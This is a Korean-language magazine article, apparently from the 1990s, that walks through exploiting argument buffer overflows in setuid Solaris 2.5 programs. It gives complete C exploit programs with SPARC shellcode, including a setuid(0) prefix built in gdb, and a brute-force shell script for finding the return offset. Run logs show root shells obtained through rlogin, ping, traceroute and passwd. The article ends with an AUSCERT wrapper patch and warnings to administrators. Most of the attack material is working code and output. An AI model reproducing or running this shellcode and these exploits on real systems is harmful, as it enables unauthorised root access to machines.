[Image]

[ 머리말 ]

지난호에서는 Overflow는 어떤 방법으로 이루어지며, 그것을 위한 SEED code를
생성하는데 주력하였다. Bound 되지 않은 string배열에 큰 데이터를 넣어서
return 주소를 바꾸어 줄 수 있으며, 또한 위치를 잘 잡아내어 shell code까지
수행할 수 있었다. 이제 그 모든 것을 실제 UNIX상의 명령에 대해서 적용을
시켜보고자 한다. 연구할 때 보다는 조금은 번거로와질 수 있지만, 어쨌든 우리는
가능성을 타진해보는 것이다.

꼭 이글을 읽고 이러이러한 이유로 여러 문제점이 야기되고 있다는 그 사실을
명확하게 인식하고, 거기에 대한 대책을 강구하기를 희망한다.

[ Solaris GethostByname() bug를 찾다 ]

필자는 예전에 overflow bug가 있다라는 말을 들으면 그냥 그렇겠지 하고 너무나
어려운 경지, 혹은 시도해보기 조차 두려운 것이라고 생각했었다. 그러나, Jeremy
Elson이라는 사람에 의해서 gethostbyname() 버그를 공격하는 프로그램이 발표된
후, 이것을 직접 시도해 보고, 동작되는 것을 확인하고 나서 실제로 이 버그에
대해서 연구를 시작하였다.

이 버그는 gethostbyname()을 사용하는 거의 모든 프로그램에 대해서 동작하는
정말 global한 버그이다. 이제 이 버그에 대해서 설명을 하겠다.

rlogin등의 프로그램은 rlogin (hostname) -l (username) 형태로 동작을 한다.
평소에 rlogin을 사용해 왔던 사람이라면 위의 형태를 모를 바가 없겠지만, 위의
형태가 overflow의 가장 보편적인 형태라면 한번쯤 생각해 보아야 하는 것이다.
rlogin 프로그램은 유저로 부터(!) hostname을 받아서, 이것을 실제로 IP 주소로
매핑을 하여 연결을 시도한다. 이때 문제점은 유저의 의해서 hostname 부분을
받는다는 점인데, 받는 것까지는 문제가 없지만 이 인자를 length체크를 하지
않고 gethostbyname()에 넘겨준다는 사실이 문제가 된다.

필자는 사실 gethostbyname()함수가 어떻게 이루어 져 있는지 알지 못한다. 단지
알고 있는 것은 gethostbyname()이 buffer overflow를 가지고 있다는 사실뿐이다.
그러면 다음의 방법으로 접근을 해보도록 한다.

먼저 overflow가 실제로 일어나는지 확인을 해볼 필요가 있으므로, 다음의
프로그램으로 overflow가 일어나는 지점을 살펴보았다.

--------------------------(*)
#include <stdio.h>
#define MAX     50000
void main (argc, argv)
int      argc;
char   **argv;
{
        char buf[MAX];
        int    i;
        for(i = 0; i < atoi(argv[1]); i++)
                buf[i] = 'a';
        buf[atoi(argv[1])] = 0;
       execl("/usr/bin/rlogin", "rlogin", buf, NULL);
}
 ---------------------------(*)

위의 프로그램은 argv[1]로 string의 길이를 받아서 rlogin에 그 length만큼의
'a'를 넣어서 돌리는 프로그램이다. argv[1]로 어떤 값을 받느냐에 따라서
string의 길이가 정의되고 있다. 그리고 나서 rlogin aaaaaa..... 이런 식으로
rlogin를 수행시킨다.

rlogin에서 받아들이는 문자열의 길이를 체크한다면, 길이를 아무리 길게 해서
넣더라도 에러가 발생해서는 안된다. 그러나, 다음을 보자.

--------------------(*)
#!/bin/sh
i=80
while [ $i -lt 50000 ] ; do
        echo $i
        ./a.out $i
        i=`expr $i + 80`
        done
--------------------(*)

위의 프로그램은 shell script인데, i라는 변수에 80을 넣고, 80씩을
증가시키면서 그 i를 a.out의 argv[1]으로 넣어주는 것이다. 최대 50000까지 돌게
한것은 위의 C프로그램에서 그렇게 정의한 이유이다. 이 프로그램을 구동시키면
문자열의 길이가 80, 160,240 등으로 계속 증가하면서 rlogin를 하게 된다.
구동을 시켜보면 재미있는 사실을 발견하게 된다.

--------(*)
% wile
80
 : unknown host aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
160
:
                                                                                                        unknown                                                                             host
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
240
:
                                                                                                         unknown                                                                             host
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
320
......
-------(*)

처음 실행할 당시의 output이다. aaaaaaa... 라는 호스트가 존재하지 않으므로,
rlogin는 그러한 호스트가 없다는 에러를 낸다. 이렇게 계속해서 실행을 하다보면
다음의 결과를 얻는다.

-------(*)
 ....
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
8320
버스 오류(Bus Error)
8400
버스 오류(Bus Error)
8480
.....
--------(*)

위의 가려진 부분은 8240이었을 것이다. 이때에는 aaaa.... 라는 호스트가 없다는
에러를 내었다. 그러나, 8320에 이르자(!)버스 오류(!)라는 에러를 낸다. 이것은
무슨 뜻인가? 이것은 이들 string이 버퍼의 영역을 넘어서 return address를
건드렸다는 뜻이 된다. 아마 8240~8320 그 length 사이에 RET주소가 존재할
것이라고 상상할 수 있다.

위에서 재미있는 사실을 발견할 수 있는데, 그것은 호스트가 존재하지 않을 경우,
: unknown host 라고 메시지를 보이면서, 뒤에 우리가 넣어준 호스트의 이름이
나타나는 것이다. 대체로 위와 같은 메시지를 낼 때에는 다음과 비슷한
프로그래밍을 하게 된다.

-----------(*)
extern char *hostname;
char buf[1000];
sprintf(buf, ": unknown host %s", hostname);
-----------(*)

그러면 문제가 되는 것은 sprintf인데, sprintf는 buf에 내용을 넣을 때
hostname의 length를 체크하지 않고 덮어서 넣게 되어 있다. 그러므로, buf를
1000이라고 잡았다면 1000은 금방 넘어가 버리고, 이전 호에서 말한 buffer
overflow가 발생할 수 있는 것이다. 필자는 아마 sprintf()를 사용하였을
것이라고 생각하고 있다.

어쨌든 그렇다면, 문자열의 끝부분에 return address들을 깔아버리면 우리가
원하는 곳으로 점핑을 시킬 수 있을 것이며, 그곳에 우리가 만든 seed code를
넣어 놓은 다면 원하던 결과를 도출 해 낼 수 있을 것이다. 그러나 문제점이
한가지 존재한다. 과연 return address를 어느 곳을 잡아 주어야 하느냐는
사실이다.

[ Stack Jumping 위치를 잡아주기 ]

위에서 찾아낸 것은 우리가 문자열의 길이를 얼마만큼 주면 overflow가
일어나는지에 관한 것이었다. 그러나, 가장 난점으로 등장하고 있는 것은 return
address가 어느 곳이냐는 것이다. 그러나, 그것은 의외로 간단히 해결된다.
다음을 보자.

--------(*) PROGRAM 1
void sub(void)
{
                char c;
                printf("%ld\n", c);
                sleep(10);
}
void main(void)
{
                sub();
}
--------(*) PROGRAM 2
void sub(void)
{
                char        c;
                printf("%ld\n", c);
                sleep(10);
}
void main(void)
{
                sub();
}
--------(*)

위의 두 프로그램을 보자. 둘의 차이점은 전혀 없다. 이때 이 두 프로그램을 서로
다른 window(process)에서 수행하였다고 생각한다. 만일 동시에 수행되고 있다면
이들이 하드웨어 메모리 상에 올라가는 위치가 분명이 다를 것이라고 짐작할 수
있다. 이들이 위치할 stack의 위치 및 프로그램이 위치하는 곳들 모든 것이 다를
것이다. 어쨌든 둘을 돌려보고 생각해보도록 한다. 둘이 동시에 떠있을 수 있도록
sleep(10)으로 10초동안 머무르도록 했다.

다음은 둘이 동시에 돌았을 때의 결과 값이다.

--------(*)
% a.out
-268436225
--------(*)
% a.out
-268436225
--------(*)

둘이 똑같은 값을 가지고 있다. 이것은 무엇을 의미하는가? 둘이 동일한 메모리를
동시에 acces했다는 말이 되는가, 그것은 아니다. 결국 의미하는 것은 바로
수행될 때 프로그램이 보고 있는 메모리의 맵이 virtual하다는 사실이다. 모든
프로세스들이 떠서 죽을 때까지 사용하는 메모리의 맵은 실제 하드웨어 상의 맵이
아닌 커널에서 적절히 제어를 한 virtual address map을 사용한다. 그렇다면
우리의 결론은 무엇인가? 우리가 어떤 프로그램에서 얻은 어드레스를 다른
프로그램에도 적용시킬 수 있다는 것이 된다.

자 이제 gethostbyname()을 실제로 overflow시켜서 shell을 띄워보자.

[ Solaris5.5 rlogin을 이용해서 shell을 띄우다 ]

자 이제 exploit를 위해서 코드를 생성해보도록 하겠다. 지난 호에서 그렇게
이야기를 했지만 seed code의 형태는 NNNNNNNNSSSSSSSSSSRRRRRRRRR 형태의
NSR구조를 가진다고 했다. 앞의 N은 혹시 모를 위치를 잡아주기 위한 NOP
code이며, S는 실제로 shell을 실행시키는 shell code이고, R은 앞의 NS구조로
점핑을 위한 어드레스라고 했다.

이때 우리는 N과 S를 가지고 있지만 R을 가지고 있지 않다. 그러나, 다행인것은
여러 기종에 따라 틀릴 지언정 하나의 기기 안에서의 stack의 구조는 똑같다는
사실이다. 그러므로, R의 위치를 scan해서 찾아내도록 하겠다.

아래의 코드는 overflow를 위한 프로그램이다.

-----(*)
#include <sys/types.h>
/* seed code */
u_char seed[] =
"\x2d\x0b\xd8\x9a"
"\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda"
"\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08"
"\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10"
"\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8"
"\xc0\x23\xbf\xfc"
"\xa6\x1c\xc0\x13"
"\xa6\x04\xe0\x01"
"\x82\x10\x20\x3b"
"\x91\xd0\x20\x08"
;
/* assembly NOP code */
#define NOP 0xa61cc013
/* 위에서 찾는 overflow가 이루어지는 buffer 길이 */
#define BUF_LENGTH     8320
/* return address를 담는 부분의 길이 */
#define RET_LENGTH     160
u_long get_sp(void)
{
            _asm__("mov %sp, %i0 \n");
}
void main(argc, argv)
int           argc;
char      **argv;
{
                char buf[BUF_LENGTH];
                u_long *putaddr; u_long retaddr;
                int     index;
                int     i;
                putaddr = buf;
        /* NOP으로 buffer를 일단 꽉 채운다. */
                for(i = 0; i < 8320 / 4; i++)
                *(putaddr++) = NOP;
        /* shell code를 RET바로 전부분에 삽입시킨다. */
                        index = BUF_LENGTH -RET_LENGTH - strlen(seed);
                        for(i = index; i < (index + strlen(seed)); i++)
                                   buf[i] = seed[i -index];
        /* 나머지 RET address를 마지막 부분에 삽입시킨다. */
                  putaddr = buf +BUF_LENGTH - RET_LENGTH;
                  retaddr = get_sp();
                  retaddr += 112;
                  retaddr -= atoi(argv[1]);
                  for(i = 0; i < (RET_LENGTH / 4); i++) {
                            *(putaddr++) = retaddr;
                            printf("%d\n",i);
                  }
        /* 이 code를 rlogin에 넣어서 수행한다. */
                        execl("/usr/bin/rlogin","rlogin", buf, NULL);
}
----(*)

이제 위의 프로그램을 간략하게 설명해보도록 하겠다. 맨처음에 나타난 char
seed[]는 이전 호에서 만든 shell을 exec하는 code이다. NOP은 아무런 일을 하지
않는 어셈블리 명령을 지칭하고 있다. BUF_LENGTH는 overflow가 일어나는
buffer의 길이를 정의한 것으로, 맨 앞에서 'a'를 넣어서 overflow가 일어나는
것을 확인한 부분에서 얻어낸 값이다. RET_LENGTH는 return code가 들어가는
부분의 길이이다.

위 프로그램이 하는 일은 정말 간단하다. 단지 NSR의 구조로 buf를 구성하게
하고, R의 경우는 argv[1]로 부터 받아서 현재 stack의 위치로 부터 얼마만큼을
뛰도록 하느냐를 정할 뿐이다. 그리고나서 이 buf를 rlogin의 인자로 넘겨서
수행한다.

위의 프로그램을 컴파일하여 돌려보았다.

------(*)
% a.out 0
잘못된 명령(Illegal Instruction)
% a.out 80
잘못된 명령(Illegal Instruction)
%
-------(*)

아마 현재의 sp위치로 부터 좀더 멀리에 NOP이 나타날 것이다. 어쨌든 이렇게
수작업으로 찾는 것은 힘이 들것이므로, automation을 해보도록 하겠다. 위에서
overflow가 나는 것을 체크하기 위해서 만든 shell script를 알것이다. 이것은
$i라는 변수를 계속 증가시켜가면서 a.out을 수행하도록 한 것인데, 이 경우에도
match를 시켜보도록 하겠다. 이 shell script의 이름을 wile이라고 명명했으니
착오없기 바란다.

---------(*)
% wile 0
잘못된 명령(Illegal Instruction)
80
세그멘테이션결함(Segmentation Fault)
160
잘못된 명령(Illegal Instruction)
240
잘못된 명령(Illegal Instruction)
320
잘못된 명령(Illegal Instruction)
400
잘못된 명령(Illegal Instruction)
480
잘못된 명령(Illegal Instruction)
560 잘못된 명령(Illegal Instruction)
640
잘못된 명령(Illegal Instruction)
720 잘못된 명령(Illegal Instruction)
800 시스템 호출 오류(Bad System Call) 880
$
--------(*)

OOPS! shell이 떴다. rlogin의 buffer overflow를 이용해서 shell을 띄우는데
성공하였다. 880 값을 넣자 shell이 떴다. 이 값은 얼마든지 증가할 수 있는데,
그것은 880에 이르러서 NOP에 걸렸다는 의미를 가지기 때문이다. 800에서 시스템
호출 오류라고 떴는데, 이것은 800에서 seed code의 중간 부분으로 Jumping을 한
이유라고 생각된다. [ setuid를 추가하여 root shell을 ... ] 문제는
이제부터이다. 왜 "#"이 뜨지 않고 "$"가 떴는가에 관한 것이다. 먼저 rlogin의
permission을 체크해보자.

---------(*)
% ls -lsa /usr/bin/rlogin
30 -rwsr-xr-x 1 root bin 14552 1995년 10월 25일 /usr/bin/rlogin*
%
----------(*)
분명히 setuid가 붙어있기 때문에, root shell이 떠야할 것인데, $가 떴다.
이것은 setuid에 실패한 것인가, 아니면 rlogin자체에서 이것을 방지하고 있는
것인가, 의문이 생기지 않을 수 없다. 필자도 이 "$"에 대해서 엄청나게 고심을
했었다. 그러나, 나중에서야 그 의문이 풀렸다. 그 원인은 setuid를 하지 않은 데
있었다. 필자는 고심 끝에 setuid(0); 라는 코드를 만들어 넣기에 이르렀다.

이제 부터 일사천리이다. 이전호나 이번 글을 제대로 읽지 않았다면 조금은
이해하기 힘들 수도 있다.

다음의 일련의 과정은 실제 상황이다.

---------(*)
% cat > setuid.c
#include <sys/types.h>
#include <unistd.h>
void main(void)
{
                setuid(0);
}
% gcc -g -static setuid.c
% gdb a.out
(gdb) disassemble main
        ^^^^^^^^^^^^^^^
Dump of assembler code for function main:
0x10150 <main>: save %sp, -112, %sp
0x10154 <main+4>: clr %o0
0x10158 <main+8>:   call   0x1022c <_setuid>
0x1015c <main+12>: nop
0x10160 <main+16>:ret
0x10164 <main+20>: restore
End of assembler dump.
(gdb) disassemble_setuid
        ^^^^^^^^^^^^^^^^^^^
Dump of assembler code for function _setuid:
0x1022c <_setuid>: mov 0x17, %g1
0x10230 <_setuid+4>: ta 8
0x10234 <_setuid+8>: bcc
0x10248 <_setuid+28>
0x10238 <_setuid+12>:sethi %hi(0x10000), %o5
0x1023c <_setuid+16>: or %o5, 0x268, %o5  ! 0x10268 <_cerror>
0x10240 <_setuid+20>: jmp %o5 0x10244 <_setuid+24>:nop
0x10248 <_setuid+28>: retl 0x1024c <_setuid+32>: mov %g0,%o0
End of assembler dump.
(gdb)
--------(*)

gdb내에서의 키인 한 것은 "^^^^"로 나타내었다. 여기에서 알아내고자 하는 것은
바로 setuid(0); 의 assembly 아니 machine code이다. 여기에서 본즉 setuid(0);
에서 0를 담당하고 있는 것은 %o0이다. 앞에서도 봤듯이 %o0, %o1.. 등이 함수의
인자로 많이 들어간다. %o0를 clr한 것은 %o0에 0을 넣는다는 의미이다. 그리고
나서 _setuid를 불렀는데, _setuid를 살펴보니 mov 0x17, %g1과 ta 8로
setuid()를 call하고 있다. 이제 이것을 machine code로 뽑아내기만 하면 되는데.

--------(*)
(gdb) x/wx 0x10154
0x10154 <main+4>:     0x90102000
(gdb) x/wx 0x1022c
0x1022c <_setuid>: 0x82102017
(gdb)
0x10230 <_setuid+4>: 0x91d02008
(gdb)
--------(*)

각각의 machine code를 보니, clr %o0가 중간에 000 이 세개나 붙어있다. 뒤의
두개의 0은 붙어서 '\0'이라는 하나의 캐릭터로 작용을 하게 되므로, 이것은
SEED로써의 자격이 없다. 또한 ta 8 을 할때 지난 번에 xor %l3, %l3, %l3 및 inc
%l3를 한 것을 기억할 것이다. 이것 또한 빠져서는 안되며, clr %o0를 xor %l3,
%l3, %l3 에다가 and %l3, %l3, %o0로 대체하기로 한다. 그러면 이들 code를
실제로 assembly로 만들어서 컴파일 해보도록 한다.

-------(*)
.global main
main:
xor %l3, %l3, %l3
and %l3, %l3, %o0
inc %l3
mov 0x17, %g1
ta 8
--------(*)

위의 assembly code는 setuid(0); 를 수행할 수 있는 것이다. 이것을 컴파일 하여
gdb로 실제 내용을 확인하도록 한다.

---------(*)
 % as test.a -o
test.o % gcc test.o
% gdb a.out
(gdb) disassemble main
        ^^^^^^^^^^^^^^^
Dump of assembler code for function main:
0x10638 <main>: xor %l3, %l3, %l3
0x1063c <main+4>: and %l3, %l3, %o0
0x10640 <main+8>: inc %l3
0x10644 <main+12>: mov 0x17, %g1
0x10648 <main+16>: ta 8
End of assembler dump.
(gdb) x/wx main
        ^^^^^^^^^
0x10638 <main>: 0xa61cc013
(gdb)
0x1063c <main+4>: 0x900cc013
(gdb)
0x10640 <main+8>: 0xa604e001
(gdb)
0x10644 <main+12>: 0x82102017
(gdb)
0x10648 <main+16>: 0x91d02008
(gdb)
---------(*)

실제로 컴파일하여 gdb로 돌린 후에 이들의 machine code를 뽑아내었다. 이들의
일련의 과정이 불명확 경우에는 이전호를 자세히 읽어주기 바란다.

이제 위의 code를 앞에 만들었던 seed code 윗부분에 덮어서 넣도록 한다. 그래서
만들어진 seed코드는 다음과 같다.

---------(*)
 /* seed code */
 u_char seed[] =
 /* 추가된 부분 */
"\xa6\x1c\xc0\x13"
"\x90\x0c\xc0\x13"
"\xa6\x04\xe0\x01"
"\x82\x10\x20\x17"
"\x91\xd0\x20\x08"
/* 원래 부분 */
"\x2d\x0b\xd8\x9a"
"\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda"
"\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08"
"\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10"
"\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8"
"\xc0\x23\xbf\xfc"
"\xa6\x1c\xc0\x13"
"\xa6\x04\xe0\x01"
"\x82\x10\x20\x3b"
"\x91\xd0\x20\x08"
;
---------(*)

이것을 이용해서 앞에서 만들었던 shell을 띄우는 code를 다시 한번 실행해보도록
하겠다.

---------(*)
% gcc gethost.c
gethost.c: In function `main':
gethost.c:44: warning: assignment from incompatible pointer type
gethost.c:54: warning: assignment from incompatible pointer type
% wile
0
잘못된 명령(IllegalInstruction)
80
세그멘테이션 결함(Segmentation Fault)
160
잘못된 명령(Illegallstruction)
240
잘못된 명령(Illegal Instruction)
320
잘못된 명령(IllegalInstruction)
400
잘못된 명령(Illegal Instruction)
480
잘못된 명령(IllegalInstruction)
560
잘못된 명령(Illegal Instruction)
640
잘못된 명령(IllegalInstruction)
720
잘못된 명령(Illegal Instruction)
800
시스템 호출 오류(BadSystem Call) 880
#
--------(*)

자 드디어 root shell을 띄우는데 성공하였다. 다른 solaris5.5 machine에서 뜨는
위치가 다를 수 있을지언정 수행이 되리라고 믿는다.

[ Solaris5.5 다른 예제들 ]

여기에서 재미난 사실이 있다. 이 버그는 gethostbyname()을 overflow시키는
것이므로, 이 함수를 사용하는 다른 프로그램들 모두가 버그가 있다는 뜻이 된다.
그러면 간략하게 나마 gethostbyname()을 이용하는 ping, traceroute등 또한
통하는지 확인을 해보도록 한다.

여기에서 바꾸어 주어야 하는 것은 execl에서 "/usr/bin/rlogin"과 "rlogin"을
적절한 명령으로 대체하는 것이다. 현 이 시스템에서는 traceroute는
/usr/local/bin 에 있고, ping은 /usr/sbin에 있다. 이것을 넣어서 실제로 구동한
실행예이다.

----(*)
% tail -5 ping.c
                        }
                        execl("/usr/sbin/ping", "ping",buf, NULL);
}
% gcc ping.c
ping.c: In function `main':
ping.c:44: warning: assignment from incompatible pointer type
ping.c:54: warning: assignment from incompatiblepointer type
% wile
0
잘못된 명령(Illegal Instruction)
80
잘못된 명령(IllegalInstruction)
160
잘못된 명령(Illegal Instruction)
240
잘못된 명령(IllegalInstruction)
320
잘못된 명령(Illegal Instruction)
400
잘못된 명령(IllegalInstruction)
480
잘못된 명령(Illegal Instruction)
560
#
 ----(*)

ping으로 대체하고 돌리자 560 byte를 jump하면서 root shell이 떴다.

----(*)
% tail -5 traceroute.c
                                *(putaddr++) = retaddr;
                }
                execl("/usr/bin/traceroute","traceroute", buf, NULL);
}
% gcc traceroute.c
traceroute.c: In function `main':
traceroute.c:44: warning: assignment from incompatiblepointer type
traceroute.c:54: warning: assignment from incompatible pointer type
arirang:/home/seoro/work/overflow-basics/maga% 0 잘못된 명령(IllegalInstruction)
80
잘못된 명령(Illegal Instruction)
160
잘못된 명령(IllegalInstruction)
240
잘못된 명령(Illegal Instruction)
320
잘못된 명령(IllegalInstruction)
400
잘못된 명령(Illegal Instruction)
480
#
-----(*)

traceroute로 대체를 하자 480byte를 jump하면서 root shell이 떴다.

(주의) 만일 당신의 시스템이 이 버그에 대해서 문제가 있을 경우, 빨리 setuid를
없애십시오. 없애야 할 것들은 rlogin, traceroute, ping 등입니다.

각 overflow가 되는 위치가 다른 것은 traceroute, ping, rlogin 등의 내부구조가
다르기 때문이다. 어쨌든 wile을 이용하여 automation을 하였으므로, 이들의 크기
등은 문제되지 않는다.

그러면 gethostbyname()을 지나쳐서 새로운 버그에 대해서 알아보겠다. 최근에
/bin/passwd 에 overflow가 존재한다는 보고가 들어왔다. passwd seoro 이러한
식으로 passwd를 지정하는데, 이때 문제는 유저가 존재하지 않는 경우, error
message를 만드는데, gethostbyname()과 동일한 방식으로 bound check를 하지
않는다는 점이다.

위에서 했던 방법대로 똑같이 처리해보겠다.

먼저 맨 위에서 했던 'a'를 넣어서 overflow되는 위치를 찾아본다.

------(*)
 ....
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa does not exist.
버스 오류(Bus Error)
2112
------(*)

wile을 16간격으로 해서 돌린 것이다. 바로 다음이 2128이 나왔으므로, 이전의
값인 2112에서 이미 overflow가 일어난 것으로 확인할 수 있다. 그러면 rlogin을
overflow한 것에서 BUF_LENGTH를 2096으로 변경하고, 아래의 execl부분을 고쳐서
만들면 다음과 같은 source를 얻을 수 있다.

------(*)
#include <sys/types.h>
u_char seed[] = "\xa6\x1c\xc0\x13"
"\x90\x0c\xc0\x13"
"\xa6\x04\xe0\x01"
"\x82\x10\x20\x17"
"\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a"
"\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda"
"\x90\x0b\x80\x0e"
"\x92\x03\xa0\x08"
"\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10"
"\xec\x3b\xbf\xf0"
"\xdc\x23\xbf\xf8"
"\xc0\x23\xbf\xfc"
"\xa6\x1c\xc0\x13"
"\xa6\x04\xe0\x01"
"\x82\x10\x20\x3b"
"\x91\xd0\x20\x08"
;
#define NOP 0xa61cc013
#define BUF_LENGTH    2112
#define RET_LENGTH       80
u_long get_sp(void)
{
                __asm__("mov %sp, %i0 \n");
}
void main(argc, argv)
int      argc;
char            **argv;
{
                char buf[BUF_LENGTH];
                u_long *putaddr;
                u_long retaddr;
                int         index;
                int         i;
                putaddr = buf;
                for(i = 0; i < BUF_LENGTH / 4; i++)
                                *(putaddr++) = NOP;
                index = BUF_LENGTH - RET_LENGTH - strlen(seed);
                for(i = index; i < (index + strlen(seed)); i++)
                        buf[i] = seed[i -index];
                putaddr = buf + BUF_LENGTH - RET_LENGTH;
                retaddr = get_sp();
                retaddr += 112;
                retaddr -= atoi(argv[1]);
                for(i = 0; i < (RET_LENGTH / 4); i++) {
                                *(putaddr++) = retaddr;
                }
                execl("/usr/bin/passwd", "passwd", buf, NULL);
}
------(*)

위의 것을 컴파일한 후 wile을 돌려보면 다음과 같다.

------(*)
3440
passwd:
                a-
                        笠/
                                 茯

芍욹芙원야웠 ;욹跡몇H跡몇歷跡몇歷跡몇歷跡몇歷跡몇歷跡몇歷跡몇歷傳H跡몇歷跡 does not exist.
잘못된 명령(Illegal Instruction)
3472
passwd:
                a-
                        笠/
                                茯

芍욹芙원야웠 ;욹跡(跡跡跡跡跡跡跡跡跡跡跡跡跡跡傳(跡跡跡 does not exist.
$
-----(*)

엇, 3472에서 shell이 떴다. 이것으로 확실히 overflow bug가 있다는 것이 확인된
셈인데, 문제는 왜"$"이냐는 것이다. 그러나, 그 문제점은 간단하다. 위에 추가된
setuid(0); 부분 바로 다음의 부분으로 jumping을 한 이유이다. 그러므로 이번에
걸려나온 것을 넘겨 보자.

------(*)
$ 3504
passwd:
                a-
                        笠/
                                茯
芍욹芙원야웠 ;욹綎綎綎綎綎綎綎綎綎綎 does not exist.
#
------(*)

Ctl-D를 누르면 간단히 shell을 나가게 되는데, wile은 계속 돌고 있으므로, 그
다음인 3504의 크기만큼을 Jumping을 했다. (현재 wile에서 step수는 32이다).
그러자 원했던 대로"#"이 나타났다. 이것으로 성공이다.

--------(*)
# id
uid=0(root) gid=100(wheel)
#
---------(*)

실제로 id를체크해보면 root라는 것을 확인 할 수 있다. 이제 확인하였으니
wile의 상태에서 빠져나간다. Ctl-Z 를 누르면 일단은 stop이 되는데, 여기에서
kill %을 두번해주면 알아서 빠져나간다.

(주의) 만일 당신의 호스트가 이 버그에 대해서 문제가 있는 경우, 곧이어 나올
패치 방법을 숙지하고 패치를 하십시오.

[ Argument overflow Patch법 ]

위의 예제들은 모두가 Argument overflow들이다. 물론 buffer overflow의
일종이지만, 이 것은 argument로 넘겨주는 값을 overflow시키는 종류라는 것이다.
overflow방법은 이것들 외에도 data overflow 및 VARIABLE overflow 등의 종류가
존재한다. 일단 나머지 data overflow 및 VARIABLE overflow의 설명을 보류하고
먼저 argument overflow의 패치 방법에 대해서 알아보도록 한다.

시스템의 source를 갖고 있지 않는 이상, 소스를 고쳐서 컴파일한다든지 하는
방법은 불가능하다. 그렇다면 업체(Vendor)로 부터 패치를 얻어서 또는 새로운
버젼의 프로그램을 얻어서 처방하는 방법밖에는 없다는 얘기가 되는데, 이
Argument overflow의 경우는 직접 패치가 가능하다.

이 패치 방법은 AUSCERT에서 발표된 것이다.

다음 프로그램은 overflow_wrapper.c 라는 프로그램이다.

-------(*)
#include <stdio.h>
#include <syslog.h>
#define MAXARGLEN 16
#define REAL_PROG "/bin/passwd.6555"
/*
* This wrapper will exit without executing REAL_PROG when
* given any command line arguments which exceed MAXARGLEN in length.
*/
main(argc,argv,envp)
int     argc;
char    *argv[];
char    *envp[];
{
                int     i;
                for (i=0; i<argc; i++)
                {
                                 if (strlen(argv[i]) > MAXARGLEN)
                                 {
                                         fprintf(stderr,"You have exceeded the argument length .. .Exiting\n");
                #ifdef SYSLOG
                                         syslog(LOG_ERR,"%.32s:possible buffer overrun attack by uid %d\n", argv[0], getuid());
                #endif

                                         exit(1);
                                 }
                }
                execve(REAL_PROG, argv, envp);
                error(oexecve failed");
                exit(1);
-------(*)

위의 프로그램은 wrap이라는 방식으로 overflow를 방지하는 것이다. 어떻게
수행되는 프로그램인지 먼저 분석을 해보겠다.

실행되면 각 argument를 받아서 그것의 length를 체크한다. 이때 위에서 정의된
MAXARGLEN 보다 더 긴 argument를 받는 경우, maxlength를 넘었다고 화면에
출력하고, SYSLOG 에 긴 argument를 받았다는 메시지를 남긴 후에 그대로
프로그램을 빠져 나간다. 그러면 "/bin/passwd"를 "/bin/passwd.6555"라고
옮겨놓은 후에 위의 프로그램을 "/bin/passwd"자리에 넣어 놓는다.
"/bin/passwd"의 permission은 원래의 permission이었던 6555로 유지시키고,
/bin/passwd.6555"는 0111로 실행만 가능하도록 맞추어 놓는다. 자 위의
wrapper를 깔기 전의 디렉토리 상태와 후의 상태를 비교하면 다음과 같다.

------(*)
((전))
% ls -lsa /bin/passwd
   32     -r-sr-sr-x     3     root     sys     15688    1995년  10월  25일   /bin/passwd*
((후))
% ls -lsa /bin/passwd
   12     -r-sr-sr-x     1     root    other     5572     3월 11일  11:17 /bin/passwd*
   32    ---x--x--x     3     root      sys    15688    1995년   10월  25일 /bin/passwd.6555*
-------(*)

차이점을 보면 원래의 passwd를 /bin/passwd.6555로 옮겨놓았고,
/bin/passwd자리에 위 프로그램을 컴파일 한것을 넣었다. 위 프로그램은
/bin/passwd 자리에 있다가 passwd를 수행하려고 하면, 먼저 MAX_LENGTH를
